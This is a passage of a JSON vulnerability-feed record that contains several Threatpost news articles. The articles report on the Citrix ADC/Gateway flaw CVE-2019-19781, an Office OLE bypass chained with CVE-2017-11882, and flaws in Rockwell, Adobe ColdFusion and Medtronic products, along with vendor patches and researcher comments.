don\u2019t.", "modified": "2020-02-19T15:55:04", "published": "2020-02-19T15:55:04", "id": "KREBS:62E2D32C0ABD1C4B8EA91C60B425255B", "href": "https://krebsonsecurity.com/2020/02/hackers-were-inside-citrix-for-five-months/", "type": "krebs", "title": "Hackers Were Inside Citrix for Five Months", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2020-02-08T11:40:52", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2019-19781"], "description": "SAN FRANCISCO \u2013 A previously unknown bug in Microsoft Office has been spotted being actively exploited in the wild; it can be used to bypass security solutions and sandboxes, according to findings released at the RSA Conference 2019.\n\nThe bug exists in the OLE file format and the way it\u2019s handled in Microsoft Word, said researchers from Mimecast. They noted that the OLE32.dll library incorrectly handles integer overflows.\n\nMicrosoft told the researchers that patching the problem is on the back burner.\n\nThe flaw allows attackers to hide exploits in weaponized Word documents in a way that won\u2019t trigger most antivirus solutions, the researchers said. In a recent spam campaign observed by Mimecast, attached Word attachments contained a hidden exploit for an older vulnerability in Microsoft Equation Editor (CVE-2017-11882). On unpatched systems, the exploit unfolded to drop a new variant of Java JACKSBOT, a remote access backdoor that infects its target only if Java is installed.\n\nJACKSBOT is capable of taking complete control of the compromised system. It has full-service espionage capabilities, including the ability to collect keystrokes; steal cached passwords and grab data from web forms; take screenshots; take pictures and record video from a webcam; record sound from the microphone; transfer files; collect general system and user information; steal keys for cryptocurrency wallets; manage SMS for Android devices; and steal VPN certificates.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe thing that stands out for me is that the attackers behind this were keen on using the Equation exploit, probably because they found it more reliable than others, and they then worked out on a bypass to allow this go through undetected,\u201d Meni Farjon, chief scientist for advanced threat detection at Mimecast, told Threatpost. \u201cThis process of chaining these two, a code-execution exploit and a flaw which leads to a bypass is somewhat unique and we don\u2019t see many of these in data-format exploits.\u201d\n\n## The Flaw in Depth\n\nAn Object Linking and Embedding (OLE) Compound File essentially acts as an underlying file system for information and objects present in a Microsoft Word document. It contains streams of data that are treated like individual files embedded within the OLE file itself. Each stream has a name (for example, the top-level stream of a document is straightforwardly named \u201cWordDocument). Streams can also contain information on macros in the document and the metadata of a document (i.e., title, author, creation date, etc.).\n\nMimecast said that according to the format specifications for the Compound File Binary File Format, the OLE stream header contains a table called DIFAT, which is made up of an array of numbers that includes section IDs and some special numbers \u2013 it\u2019s here that the problem resides.\n\n\u201cTo access the sector N in the table, it\u2019s offset computed using the following formula: sector size * (sector ID + 1), when sector ID is DIFAT[N],\u201d the researchers explained in findings. \u201cIt seems that when a big sector ID exists, [this formula] leads to an integer-overflow that results in a relatively small offset. Because the result is more than 32 bits (integer overflow), only the lowest 32 bits will be the product when the code above performs the calculation. In other words, the calculated offset will be 0x200 = 512.\u201d\n\nThe system sees an impossible offset, according to the researchers; this can lead it to crash or, at the very least, ignore the section, including any exploit that may be hiding there.\n\n\u201cThis behavior is not documented by Microsoft, but it can confuse high-level parsers, which will not notice the overflow,\u201d Mimecast said.\n\n## In the Wild\n\nMimecast researchers said that they\u2019ve seen several attacks in the last few months that chain together the CVE-2017-11882 exploit with the OLE flaw, which has been successful, they said, in amplifying the attack to make it go undetected.\n\n\u201cOur systems were able to spot an attacker group, which seems to originate from Serbia, using specially crafted Microsoft Word documents\u2026in a way which caused the attacks to circumvent many security solutions designed to protect data from infestation,\u201d Mimecast said. The firm didn\u2019t specify which security solutions they\u2019re referring to.\n\n\u201c[With] this chaining of the older exploit with this integer overflow, Microsoft Office Word mishandles this error. It ignores the higher bytes of the OLE sector ID, loading the malicious object ([CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)) into memory while not following the correct guidelines,\u201d the researchers said.\n\nFarjon told Threatpost that although the newly found issue is being used in the wild, \u201cexploiting this is not an easy task, as it requires deep format understanding.\u201d It\u2019s the difficulty in execution that is likely behind Microsoft\u2019s decision to not immediately patch the problem, he said.\n\n## Microsoft Response\n\nDespite evidence that the flaw is being actively exploited to great effect in the wild, the Microsoft Security Response Center told Mimecast that it will not be fixing OLE with a security patch anytime soon, because the issue by itself does not result in memory corruption and thus doesn\u2019t meet the security bar for an immediate fix.\n\n\u201cWhat Microsoft said is that they won\u2019t be fixing it right now, but perhaps they will on a later undefined date,\u201d Farjon told Threatpost.\n\nHe added, \u201cThey said it is an unintended behavior, but at the same time that it is not important enough to fix right now. Realistically, Microsoft needs to prioritize their work on patches, so their decision makes sense. That being said, it\u2019s up to security professionals to make sure their systems are as up to date as possible and that they are leveraging the threat intelligence they need to better manage today\u2019s evolving threats.\u201d\n\nThe researcher also offered a bottom-line assessment: \u201cAnalyzing all possible outcomes of such flaw is a tough task,\u201d he said. \u201cMimecast worked with the Microsoft Security Response Center and they did analyze all possible outcomes, and came to the conclusion that it didn\u2019t result in memory corruption. So, while it may not be severe, having another tool for attackers to bypass security solutions is not a good thing.\u201d\n\nThreatpost reached out to the computing giant for comments on the findings, and received a short statement: _\u201c_The bug submitted did not meet the severity bar for servicing via a security update,\u201d said a Microsoft spokesperson.\n\n**_Follow all of Threatpost\u2019s RSA Conference 2019 coverage by visiting our [special coverage section](<https://threatpost.com/microsite/rsa-conference-2019-show-coverage/>)._**\n", "modified": "2019-03-05T11:00:03", "published": "2019-03-05T11:00:03", "id": "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "href": "https://threatpost.com/zero-day-exploit-microsoft/142327/", "type": "threatpost", "title": "RSAC 2019: Microsoft Zero-Day Allows Exploits to Sneak Past Sandboxes", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:31:10", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781", "CVE-2020-5135"], "description": "About one in five of the 80,000 companies affected by a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway are still at risk from a trivial attack on their internal operations.\n\nIf exploited, the flaw could allow unauthenticated attackers to gain remote access to a company\u2019s local network and carry out arbitrary code-execution. Researchers told Threatpost that other attacks are also possible, including denial-of-service (DoS) campaigns, data theft, lateral infiltration to other parts of the corporate infrastructure, and phishing.\n\nAccording to an assessment from Positive Technologies, which disclosed the software vulnerability in December (tracked as [CVE-2019-19781](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>)), 19 percent of vulnerable organizations in 158 countries have yet to patch. The U.S. originally accounted for 38 percent of all vulnerable organizations; about 21 percent of those are still running vulnerable instances of the products as of this week, PT said.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe Citrix products (formerly the NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively.\n\n\u201cPatching this bug should be an urgent priority for all remaining companies affected,\u201d said Mikhail Klyuchnikov, an expert at PT who discovered the flaw, speaking to Threatpost. \u201cThe critical vulnerability allows attackers to obtain direct access to the company\u2019s local network from the internet. This attack does not require access to any accounts, and therefore can be performed by any external attacker.\u201d\n\nHe added, \u201cThe flaw is really easy to exploit. It\u2019s also very reliable.\u201d[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/02/07094404/PT_Citrix_NewMap-EN.jpg>)\n\nSince Citrix is mainly used for giving remote access to applications in companies\u2019 internal networks, Klyuchnikov told Threatpost that a compromise could easily used as a foothold to move laterally across a victim organization.\n\n\u201cThe critical information about applications accessible by Citrix can be leaked,\u201d he explained. \u201cThat could possibly include information (and possibly credentials) about internal web applications, corporate applications, remote desktops and other applications available through the Citrix Gateway.\u201d\n\nAttackers also could gain the ability to read configuration files, he said; these contain sensitive information like user credentials, yet more information about the internal network and credentials for internal services (LDAP, RADIUS and so on).\n\n\u201cDepending on system settings, attackers can get administrative credentials for the Citrix Gateway, credentials (login, password, etc.) of company employees and credentials of other services used in Citrix Gateway [from the configuration files],\u201d he said.\n\nAdding insult to injury, various other kinds of attacks are possible as well.\n\n\u201c[An attacker] can conduct DoS attacks against Citrix Gateway, just deleting its critical files,\u201d the researcher explained to Threatpost. \u201cIt can lead to unavailability of the login page of Citrix application. Thus, no one (e.g. company employees) can get access into internal network using Citrix gateway. In other words, the Citrix gateway application will cease to do its main task for which it was installed.\u201d\n\nIt\u2019s also possible to conduct phishing attacks. For example, a hacker can change the login page so that the entered username and password is obtained by the attacker as clear text.\n\nAnd then there\u2019s the remote code-execution danger: \u201cAn attacker can use a compromised application as part of a botnet or for cryptocurrency mining. And of course, it can place malicious files in this application,\u201d Klyuchnikov noted.\n\nIn-the-wild attacks could be imminent: On January 8, a researcher [released an exploit](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) that allows a potential attacker to perform automated attacks. Others followed.\n\nhttps://twitter.com/GossiTheDog/status/1214892555306971138\n\nCitrix did not disclose many details about the vulnerability [in its security advisory](<https://support.citrix.com/article/CTX267027>), however, Qualys researchers last month said that the mitigation steps offered by the vendor suggest the flaw stems from the VPN handler failing to sufficiently sanitize user-supplied inputs.\n\nAccording to PT, the countries with the greatest numbers of vulnerable companies are led by Brazil (43 percent of all companies where the vulnerability was originally detected), China (39 percent), Russia (35 percent), France (34 percent), Italy (33 percent) and Spain (25 percent). The USA, Great Britain, and Australia each stand at 21 percent of companies still using vulnerable devices without any protection measures.\n\nLast month, Citrix [issued patches](<https://support.citrix.com/article/CTX267027>) for several product versions to fix the issue, [ahead of schedule](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>).\n\n\u201cConsidering how long this vulnerability has been around (since the first vulnerable version of the software was released in 2014), detecting potential exploitation of this vulnerability (and, therefore, infrastructure compromise) retrospectively becomes just as important [as patching],\u201d Klyuchnikov said.\n\nHe added, \u201cI think it\u2019s easy to apply the patch, as there is already a regular update for the hardware that fixes the vulnerability. Nothing should get in the way, as there is a full update from Citrix.\u201d\n\n**Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us **[**Wednesday, Feb. 19 at 2 p.m. ET**](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>)** when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives.**\n", "modified": "2020-02-07T15:32:52", "published": "2020-02-07T15:32:52", "id": "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "href": "https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/", "type": "threatpost", "title": "Critical Citrix RCE Flaw Still Threatens 1,000s of Corporate LANs", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:27:01", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781", "CVE-2020-5135"], "description": "Digital workspace and enterprise networks vendor Citrix has announced a critical vulnerability in the Citrix Application Delivery Controller (ADC) and Citrix Gateway. If exploited, it could allow unauthenticated attackers to gain remote access to a company\u2019s local network and carry out arbitrary code execution.\n\nThe Citrix products (formerly the NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively, and are installed in at least 80,000 companies in 158 countries, according to Mikhail Klyuchnikov, a researcher at Positive Technologies. The U.S accounts for about 38 percent of vulnerable organizations.\n\n\u201cThis attack does not require access to any accounts, and therefore can be performed by any external attacker,\u201d he noted in research released on Tuesday. \u201cThis vulnerability allows any unauthorized attacker to not only access published applications, but also attack other resources of the company\u2019s internal network from the Citrix server.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWhile neither Citrix nor Positive Technologies released technical details on the bug ([CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)), they said it affects all supported versions of the product, and all supported platforms, including Citrix ADC and Citrix Gateway 13.0, Citrix ADC and NetScaler Gateway 12.1, Citrix ADC and NetScaler Gateway 12.0, Citrix ADC and NetScaler Gateway 11.1, and also Citrix NetScaler ADC and NetScaler Gateway 10.5, according to the research.\n\n\u201cCitrix applications are widely used in corporate networks,\u201d said Dmitry Serebryannikov, director of security audit department at Positive Technologies, in a statement. \u201cThis includes their use for providing terminal access of employees to internal company applications from any device via the internet. Considering the high risk brought by the discovered vulnerability, and how widespread Citrix software is in the business community, we recommend information security professionals take immediate steps to mitigate the threat.\u201d\n\nCitrix released a [set of measures](<https://support.citrix.com/article/CTX267679>) to mitigate the vulnerability, including software updates, according to the researchers.\n\nThe vendor [made security news](<https://threatpost.com/citrix-confirms-password-spraying-heist/146641/>) earlier this year when cyberattackers used password-spraying techniques to make off with 6TB of internal documents and other data. The attackers intermittently accessed Citrix\u2019 infrastructure between October 13, 2018 and March 8, the company said, and the crooks \u201cprincipally stole business documents and files from a company shared network drive that has been used to store current and historical business documents, as well as a drive associated with a web-based tool used in our consulting practice.\u201d\n\nPassword-spraying is a related type of attack to brute-forcing and credential-stuffing. Instead of trying a large number of passwords against a single account, in password-spraying the adversary will try a single commonly used password (such as \u201c123456\u201d) against many accounts. If unsuccessful, a second password will be tried, and so on until accounts are cracked. This \u201clow and slow\u201d method is used to avoid account lock-outs stemming from too many failed login attempts.\n\nIn the case of Citrix, which has always specialized in federated architectures, the FBI surmised in March that the attackers likely gained a foothold with limited access, and then worked to circumvent additional layers of security. That was backed up by evidence that the attackers were trying to pivot to other areas of the infrastructure.\n", "modified": "2019-12-26T19:17:55", "published": "2019-12-26T19:17:55", "id": "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "href": "https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/", "type": "threatpost", "title": "Critical Citrix Bug Puts 80,000 Corporate LANs at Risk", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-08T12:00:56", "bulletinFamily": "info", "cvelist": ["CVE-2018-19282", "CVE-2019-19781"], "description": "A critical denial-of-service (DoS) vulnerability has been found in a Rockwell Automation industrial drive, which is a logic-controlled mechanical component used in industrial systems to manage industrial motors.\n\nThe vulnerability was identified in Rockwell Automation\u2019s PowerFlex 525 drive component, which is used in applications such as conveyors, fans, pumps and mixers. The drive offers a wide range of motor and software controls from regulating volts per hertz and software used to manage EtherNet/IP networks.\n\nThe flaw, CVE-2018-19282, could be exploited to manipulate the drive\u2019s physical process and or stop it, according to researchers with Applied Risk who found it. The vulnerability has a CVSS score of 9.1, making it critical, according to researchers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis finding allows an attacker to crash the Common Industrial Protocol (CIP) in a way that it does not accept any new connection,\u201d Nicholas Merle, with Applied Risk, [wrote in a Thursday analysis](<https://applied-risk.com/application/files/4215/5385/2294/Advisory_AR2019004_Rockwell_Powerflex_525_Denial_of_Service.pdf>) (PDF). \u201cThe current connections however, are kept active, giving attackers complete control over the device.\u201d\n\nThe vulnerability is critical because it gives \u201ccomplete access to the device and DOS for the other users,\u201d an Applied Risk spokesperson told Threatpost. \u201cSo availability and integrity are impacted, with no confidentiality impact. Those are also the most important factors in OT environment.\u201d** **\n\nFor a variable frequency drive, which controls the speed of motors in a live production environment, that kind of shutdown could have a serious impact. There are no known public exploits that target this vulnerability, researchers said. Impacted were versions 5.001 and older for the software.\n\nTo exploit the vulnerability, a bad actor could send a precise sequence of packets effectively crashing the Common Industrial Protocol (the industrial protocol for industrial automation applications) network stack. An Applied Risk spokesperson told Threatpost that an attacker could be remote and wouldn\u2019t need to be authenticated.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/29091619/drive.png>)\n\nRockwell Automation Powerflex 525\n\nThis creates an error in the control and configuration software, which crashes. After it crashes, it is not possible to initiate a new connection to the device, effectively forbidding any legitimate user to recover control, researchers said.\n\nIf the attacker maintains the connection used to send the payload open, he can continue sending commands as long as the connection is not interrupted, and the only way to recover access to the device is to do a power reset, researchers said.** **\n\n\u201cSending a specific UDP packet, a definite amount of time corrupts the\u2026 daemon forbidding any new connection to be initiated and disconnecting the configuration and control software from Rockwell Automation,\u201d said researchers.\n\nThe flaw was first discovered July 30, 2018 and has since been patched. Rockwell Automation did not respond to a request for comment from Threatpost.\n\nVulnerabilities are particularly insidious when they impact industrial control systems because of the high-risk implications. According to a [U.S. Department of Homeland Security bulletin](<https://ics-cert.us-cert.gov/advisories/ICSA-19-087-01>) the bug ([CVE-2018-19282)](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19282>) the vulnerability is a threat to U.S. critical infrastructure. Downtime for these systems could pose dire monetary \u2013 and in some cases even life-threatening \u2013 risks.\n\nRockwell Automation isn\u2019t the only industrial control system manufacturer facing security woes. In [February](<https://threatpost.com/siemens-critical-remote-code-execution/141768/>), Siemens released 16 security advisories for various industrial control and utility products, including a warning for a critical flaw in the WibuKey digital rights management (DRM) solution that affects the SICAM 230 process control system.\n\nAnd in August, [Schneider Electric](<https://threatpost.com/high-severity-flaws-patched-in-schneider-electric-products/137034/>) released fixes for a slew of vulnerabilities that can be exploited remotely in two of its industrial control system products.\n", "modified": "2019-03-29T14:13:54", "published": "2019-03-29T14:13:54", "id": "THREATPOST:B956AABD7A9591A8F25851E15000B618", "href": "https://threatpost.com/critical-rockwell-automation-bug-in-drive-component-puts-iiot-plants-at-risk/143258/", "type": "threatpost", "title": "Critical Rockwell Automation Bug in Drive Component Puts IIoT Plants at Risk", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-08T11:40:59", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781", "CVE-2019-7816"], "description": "Adobe has issued an emergency patch for a critical vulnerability in its ColdFusion service that is being exploited in the wild.\n\nThe vulnerability, CVE-2019-7816, exists in Adobe\u2019s commercial rapid web application development platform, ColdFusion. The ColdFusion vulnerability is a file upload restriction bypass which could enable arbitrary code execution.\n\n\u201cAdobe has released security updates for ColdFusion versions 2018, 2016 and 11,\u201d according to the company\u2019s [security update](<https://helpx.adobe.com/security/products/coldfusion/apsb19-14.html>). \u201cThese updates resolve a critical vulnerability that could lead to arbitrary code execution in the context of the running ColdFusion service.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThis attack requires the ability to upload executable code to a web-accessible directory, and then execute that code via an HTTP request, so restricting requests to directories where uploaded files are stored will mitigate the attack, Adobe said.\n\nImpacted is ColdFusion 2018, update 2 and earlier; ColdFusion 2016, update 9 and earlier; and ColdFusion 11, update 17 and earlier versions. The security update has a priority 1 rating, meaning that it resolves vulnerabilities being targeted by exploits in the wild.\n\n\u201cAdobe recommends administrators install the update as soon as possible. (for example, within 72 hours),\u201d according to the company\u2019s priority update [page](<https://helpx.adobe.com/security/severity-ratings.html>).\n\nCharlie Arehart, Moshe Ruzin, Josh Ford, Jason Solarek, and Bridge Catalog Team were credited with discovering the vulnerability.\n\nOne of these researchers, Charlie Arehart, told Threatpost that he is still in discussions with Adobe PSIRT about what can be publicly released. In the meantime, no further details about the vulnerability or subsequent exploits have been released.\n\nThe emergency update comes a week after a separate [unscheduled Adobe update](<https://threatpost.com/adobe-re-patches-critical-acrobat-reader-flaw/142098/>), which fixed a critical zero-day vulnerability in Acrobat Reader. The zero-day vulnerability in Adobe Reader, disclosed by Alex Infuhr from cure53 in a Jan. 26 post, enabled bad actors to steal victims\u2019 hashed password values, known as \u201cNTLM hashes.\u201d\n", "modified": "2019-03-01T20:22:43", "published": "2019-03-01T20:22:43", "id": "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "href": "https://threatpost.com/adobe-patches-critical-coldfusion-vulnerability-with-active-exploit/142391/", "type": "threatpost", "title": "Adobe Patches Critical ColdFusion Vulnerability With Active Exploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:25:54", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781", "CVE-2020-5135"], "description": "Citrix has quickened its rollout of patches for a critical vulnerability ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) in the Citrix Application Delivery Controller (ADC) and Citrix Gateway products, on the heels of recent proof-of-concept exploits and skyrocketing exploitation attempts.\n\nSeveral versions of the products still remain unpatched \u2013 but they will be getting a patch sooner than they were slated to. While Citrix originally said some versions would get a patch Jan. 31, it has now also shortened that timeframe, saying fixes are forthcoming on Jan 24 (Friday of this week).\n\nAlso, Citrix patched Citrix ADC and Citrix Gateway version 11.1 (with firmware update Refresh Build 11.1.63.15) and 12 (firmware update Refresh Build 12.0.63.13) on Jan. 19 \u2014 a day earlier than it had expected to.\n\n[](<https://register.gotowebinar.com/register/7679724086205178371?source=art>)\n\nThe versions that Citrix expects to patch on Jan. 24 include Citrix ADC and Citrix Gateway version 10.5 (with Refresh Build 10.5.70.x), 12.1 (Refresh Build 12.1.55.x), 13 (Refresh Build 13.0.47.x), as well as Citrix SD-WAN WANOP Release 10.2.6 (with Citrix ADC Release 11.1.51.615) and Citrix SD-WAN WANOP Release 11.0.3 (Citrix ADC Release 11.1.51.615).\n\nWhen it was originally disclosed [in December](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>), the vulnerability did not have a patch, and Citrix [announced](<https://support.citrix.com/article/CTX267027>) it would not be issuing fixes for the gateway products and ADC (formerly called NetScaler ADC), a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web, until \u201clate January.\u201d\n\nHowever, in the following weeks after disclosure, various researchers published public [proof-of-concept (PoC) exploit code](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) for the flaw. At the same time, [researchers warned of active exploitations](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>), and [mass scanning activity](<https://twitter.com/bad_packets/status/1217234838446460929>), for the vulnerable Citrix products.\n\n> CVE-2019-19781 mass scanning activity from these hosts is still ongoing. <https://t.co/pK4Qus1eAo>\n> \n> \u2014 Bad Packets Report (@bad_packets) [January 14, 2020](<https://twitter.com/bad_packets/status/1217234838446460929?ref_src=twsrc%5Etfw>)\n\nIn one unique case of exploitation, [researchers at FireEye said last week](<https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html>) that a threat actor was targeting vulnerable Citrix devices with a previously-unseen payload, which they coined as \u201cNOTROBIN.\u201d\n\nResearchers said that the attack group behind the payload appeared to be scanning for vulnerable ADC devices and deploying their own malware on the devices, which would then delete any previously-installed malware. Researchers suspect that the threat actors may be trying to maintain their own backdoor access in compromised devices.\n\n\u201cUpon gaining access to a vulnerable NetScaler [ADC] device, this actor cleans up known malware and deploys NOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains backdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign,\u201d researchers said.\n\nWith patches now being available or soon to be rolled out, security experts urge customers to update as soon as possible.\n\n\u201cCISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP once the appropriate firmware updates become available,\u201d according to a Monday CISA alert on the patches. \u201cThe fixed builds can be downloaded from Citrix Downloads pages for [Citrix ADC](<https://www.citrix.com/downloads/citrix-adc/>) and [Citrix Gateway](<https://www.citrix.com/downloads/citrix-gateway/>). Until the appropriate update is accessible, users and administrators should apply Citrix\u2019s interim mitigation steps for CVE-2019-19781.\u201d\n\n**_Concerned about mobile security? _**[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) **_Top 8 Best Practices for Mobile App Security, on Jan. 22 at 2 p.m. ET. _**_**Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts from **_**_Secureworks and White Ops to discuss the secrets of building a secure mobile strategy, one app at a time. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)**_._**\n\n**Share this article:**\n\n * [Editor's Picks](<https://threatpost.com/category/editors-picks/>)\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n", "modified": "2020-01-21T17:19:28", "published": "2020-01-21T17:19:28", "id": "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "href": "https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/", "type": "threatpost", "title": "Citrix Accelerates Patch Rollout For Critical RCE Flaw", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-08T11:39:59", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781", "CVE-2019-6538", "CVE-2019-6540"], "description": "The Department of Homeland Security has issued an emergency alert warning of critical flaws allowing attackers to tamper with several Medtronic medical devices, including defibrillators.\n\nThe two vulnerabilities \u2013 comprised of a medium and critical-severity flaw \u2013 exist in 20 products made by the popular medical device manufacturer, including an array of defibrillators and home patient monitoring systems. An update is not yet available for fixing these flaws, Medtronic told Threatpost.\n\nThe flaws could allow a local attacker to take control of the devices\u2019 functions \u2013 and for a product like an implantable cardioverter defibrillator, which is inserted under the skin and shocks patients\u2019 irregular heartbeats into a normal rhythm, that could have dangerous implications.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe result of successful exploitation of these vulnerabilities may include the ability to read and write any valid memory location on the affected implanted device and therefore impact the intended function of the device,\u201d according to [the DHS alert](<https://ics-cert.us-cert.gov/advisories/ICSMA-19-080-01>).\n\nImpacted products include homecare patient monitors, portable computer system used to program cardiac devices, and several specific Medtronic implanted cardiac devices \u2013 potentially up to 750,000 devices, according to a [report](<http://www.startribune.com/750-000-medtronic-defibrillators-vulnerable-to-hacking/507470932/>) by the Star Tribune.\n\nA Medtronic spokesperson stressed that while defibrillators are impacted, the issue does not affect Medtronic pacemakers or insertable cardiac monitors.\n\n\u201cMedtronic is conducting security checks to look for unauthorized or unusual activity that could be related to these issues,\u201d the spokesperson told Threatpost. \u201cTo date, no cyberattack, privacy breach, or patient harm has been observed or associated with these issues. Medtronic is developing a series of software updates to better secure the wireless communication affected by these issues. The first update is scheduled for later in 2019, subject to regulatory approvals.\u201d\n\n## The Flaws\n\nThe vulnerabilities stem from the Conexus telemetry protocol, which does not implement authentication, authorization or encryption for communication \u2013 allowing an attacker to easily carry out several attacks, such as viewing or altering sensitive data. The Conexus telemetry protocol is used as part of Medtronic\u2019s remote patient management system.\n\nThe vulnerabilities specifically are a critical improper access control vulnerability ([CVE-2019-6538](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6538>)), which has a CVSS score of 9.3 as it only requires a low skill level to exploit; and a cleartext transmission of sensitive information vulnerability ([CVE-2019-6540](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6540>)) which has a CVSS score of 6.5.\n\n\u201cSuccessful exploitation of these vulnerabilities may allow an attacker with adjacent short-range access to one of the affected products to interfere with, generate, modify, or intercept the radio frequency (RF) communication of the Medtronic proprietary Conexus telemetry system, potentially impacting product functionality and/or allowing access to transmitted sensitive data,\u201d according to the DHS advisory.\n\nThe improper access control stems from the fact that the Conexus telemetry protocol utilized in impacted products does not implement authentication or authorization.\n\n\u201cThis communication protocol provides the ability to read and write memory values to affected implanted cardiac devices; therefore, an attacker could exploit this communication protocol to change memory in the implanted cardiac device,\u201d warned the DHS.\n\nIn order to exploit the vulnerabilities, an attacker would need a radio frequency device capable of transmitting or receiving Conexus telemetry communication (such as a monitor, programmer, or software-defined radio) and would need short-range access to the vulnerable products.\n\n## Updates To Come\n\nMedtronic has applied additional controls for monitoring and responding to improper use of the Conexus telemetry protocol by the affected implanted cardiac devices \u2013 but updates will not be ready until later in 2019.\n\nIn the meantime, \u201cMedtronic and the FDA recommend that patients and physicians continue to use devices and technology as prescribed and intended, as this provides for the most efficient way to manage patients\u2019 devices and heart conditions,\u201d Medtronic said in a statement.\n\nIt\u2019s only the latest set of security issues found in medical manufacturer Medtronic. [In 2018](<https://threatpost.com/remote-code-implantation-flaw-found-in-medtronic-cardiac-programmers/138363/>), a flaw in Medtronic\u2019s CareLink 2090 and CareLink Encore 29901 programmers was discovered allowing remote code implantation over Medtronic\u2019s dedicated Software Deployment Network.\n\nAt Black Hat 2018, researchers stressed that the healthcare device landscape remains insecure and in need of addressing.\n\n\u201c[These attacks] alter how physicians act with patients because they trust technology implicitly,\u201d said Jeff Tully, a pediatrician and anesthesiologist at the University of California Davis at Black Hat.\n\n(Image is licensed under the [Creative Commons](<https://en.wikipedia.org/wiki/en:Creative_Commons> \"w:en:Creative Commons\" ) [Attribution 3.0 Unported](<https://creativecommons.org/licenses/by/3.0/deed.en>) license.)\n", "modified": "2019-03-22T16:07:33", "published": "2019-03-22T16:07:33", "id": "THREATPOST:FADCF664C06E3747C40C200AE681FDF8", "href": "https://threatpost.com/medtronic-defibrillators-have-critical-flaws-warns-dhs/143068/", "type": "threatpost", "title": "Medtronic Defibrillators Have Critical Flaws, Warns DHS", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:26:26", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781", "CVE-2019-19881", "CVE-2020-5135"], "description": "Proof-of-concept (PoC) exploit code has been released for an unpatched remote-code-execution vulnerability in the Citrix Application Delivery Controller (ADC) and Citrix Gateway products.\n\nThe vulnerability ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)), which Threatpost [reported on in December,](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) already packs a double-punch in terms of severity: Researchers say it is extremely easy to exploit, and affects all supported versions of Citrix Gateway products and Citrix ADC, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web.\n\n\u201cThe vulnerability allows an unauthenticated remote attacker to execute arbitrary code on the system,\u201d said Qualys [researchers in an analysis last 